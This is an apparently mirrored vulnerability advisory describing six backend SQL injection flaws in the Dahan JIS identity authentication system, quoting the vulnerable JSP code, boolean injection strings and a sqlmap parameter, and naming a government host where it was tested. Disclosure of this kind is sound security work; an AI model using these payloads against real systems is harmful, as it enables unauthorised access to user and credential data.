|大汉版通JIS统一身份认证系统系统多处SQL注入

大汉版通JIS统一身份认证系统系统多处SQL注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：只是冲着数量来的。后台SQL注入，有点怀疑是实习程序员……临时工的作品？ ### 详细说明：后台SQL1 第一个先拿一个麻烦一点的来演示，后面的同理需要有应用管理员或者系统管理员的权限登录。 /jis/manage/datasbase/que_datasbase.jsp ``` if (que_keywords.length() > 0) { strSqlCondition.append(" AND vc_collocatename like '%" + que_keywords + "%'"); } ``` 为了配合工具利用，需要先新增监听管理： http://management.ysx.gov.cn/jis/manage/datasbase/opr_datasbase.jsp?fn_billstatus=A& [<img src="https://images.seebug.org/upload/201401/26223057d516aeff1e2f1a1159db0097c7cd92e3.png" alt="image025.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223057d516aeff1e2f1a1159db0097c7cd92e3.png) 只要是公网可以访问的IP，而且用户名、密码是对的就行了。否则会提示无法连接之类的 [<img src="https://images.seebug.org/upload/201401/262231512c43236f3208c7162394c1344f395cb8.png" alt="image027.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262231512c43236f3208c7162394c1344f395cb8.png) 添加了之后就有作为标识用的字符串出来了在搜索框内输入' and '%'=' 页面没有变化 [<img src="https://images.seebug.org/upload/201401/2622335890c63f23ebb0f43d90c274d5f6926258.png" alt="image029.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/2622335890c63f23ebb0f43d90c274d5f6926258.png) 输入' and '1'='，页面变化了 [<img src="https://images.seebug.org/upload/201401/2622332837a680c7f7de0400d8ce8bd5d15e0eb1.png" alt="image031.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/2622332837a680c7f7de0400d8ce8bd5d15e0eb1.png) 带上cookie丢工具吧 Sqlmap配置data的时候这样来比较好：--data "que_keywords=' * and '%'='" [<img src="https://images.seebug.org/upload/201401/26223428e85dfc75d8638debdcad8f257f6eead0.png" alt="image033.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223428e85dfc75d8638debdcad8f257f6eead0.png) [<img src="https://images.seebug.org/upload/201401/262234469ef787baa9f905d501d80832f2e38b60.png" alt="image035.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262234469ef787baa9f905d501d80832f2e38b60.png) 后台SQL2 jis/manage/app/que_application.jsp ``` if (que_keywords.length() > 0) { strSqlCondition.append(" AND vc_appname LIKE '%" + que_keywords+ "%' OR vc_appmark LIKE '%" + que_keywords+ "%'"); } ``` 权限要求同上照旧，搜索处输入' and '%'=' [<img src="https://images.seebug.org/upload/201401/262235160a61b1509eb63fd1e17be00299264ac6.png" alt="image037.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262235160a61b1509eb63fd1e17be00299264ac6.png) ' and '1'=' [<img src="https://images.seebug.org/upload/201401/262235352efb03fe052d75221f02dad7d2f9dd8b.png" alt="image039.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262235352efb03fe052d75221f02dad7d2f9dd8b.png) 工具利用方法类似上一个。后台SQL3 jis/sys/user/que_userginfo.jsp 类似上两个漏洞 ``` if(que_keywords.length()>0) strSqlCondition.append(" AND vc_usergroupname like '%"+que_keywords+ "%' OR vc_groupallname like '%"+que_keywords+"%'"); ``` 搜索输入 ' and '%'=' 搜索出所有结果： [<img src="https://images.seebug.org/upload/201401/26223625d4b4928b3ea8318a9c4543c694051f33.png" alt="image041.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223625d4b4928b3ea8318a9c4543c694051f33.png) ### 漏洞证明：后台SQL4 jis/manage/role/que_approleinfo.jsp ``` if(que_keywords.length()>0) { strSqlCondition.append(" AND vc_rolename like '%"+que_keywords+"%'"); } if(que_webid.length()>0) { strSqlCondition.append(" AND i_webid = '"+que_webid+"'"); } ``` 输入' and '%'=' [<img src="https://images.seebug.org/upload/201401/26223658afd9ca7751a555a8f9b40ba4b84ae25b.png" alt="image043.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223658afd9ca7751a555a8f9b40ba4b84ae25b.png) ' and '%'='1 [<img src="https://images.seebug.org/upload/201401/262237251b933cafa35dd20c281696bb9136021c.png" alt="image045.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262237251b933cafa35dd20c281696bb9136021c.png) 后台SQL5 jis/manage/log/que_log.jsp ``` if(que_keywords.length()>0){ strSqlCondition.append(" AND vc_operatecontent like '%"+que_keywords+"%' OR c_userid like '%"+que_keywords+"%' OR vc_modulename like '%"+que_keywords+"%' OR vc_state like '%"+que_keywords+"%' "); } ``` 搜索输入 admin%' or '%'=' 出来全部结果： [<img src="https://images.seebug.org/upload/201401/262237547753cbeb71e5e23960b93b843c5f2780.png" alt="image047.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262237547753cbeb71e5e23960b93b843c5f2780.png) 改为admin%' and '%'=' 则只出现admin的日志： [<img src="https://images.seebug.org/upload/201401/262238153807b262b627a2176e208696a04f16f4.png" alt="image049.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262238153807b262b627a2176e208696a04f16f4.png) 后台SQL6 jis/manage/sysview/que_sysview.jsp 输入fgj' or '%'=' [<img src="https://images.seebug.org/upload/201401/26223838b6052206ca7df0d31c09e2c1f03be5b2.png" alt="image051.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223838b6052206ca7df0d31c09e2c1f03be5b2.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™